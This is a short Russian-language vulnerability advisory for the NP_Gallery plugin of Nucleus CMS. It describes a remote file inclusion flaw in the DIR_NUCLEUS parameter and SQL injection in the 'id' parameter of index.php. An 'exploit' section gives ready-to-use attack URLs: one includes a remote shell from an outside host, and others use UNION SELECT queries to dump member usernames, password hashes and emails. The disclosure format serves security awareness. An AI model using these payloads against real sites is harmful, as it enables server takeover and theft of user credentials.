Программа: NP_Gallery (plugin for Nucleus) 0.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе и выполнить произвольные SQL команды в базе данных
приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "DIR_NUCLEUS" сценарием nucleus/plugins/NP_gallery.php . Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "id" сценарием index.php (если "action" установлен в "plugin", "name"
установлен в "gallery", и "type" установлен в "album" или "item). Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://localhost/[path]/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=[evilc0de]
http://localhost/[path]/index.php?action=plugin&name=gallery&type=album&id=[SQLi]
http://localhost/[path]/index.php?action=plugin&name=gallery&type=item&id=[SQLi]
http://localhost/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://host.com/shell?
http://localhost/index.php?action=plugin&name=gallery&type=album&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--
http://localhost/index.php?action=plugin&name=gallery&type=item&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--
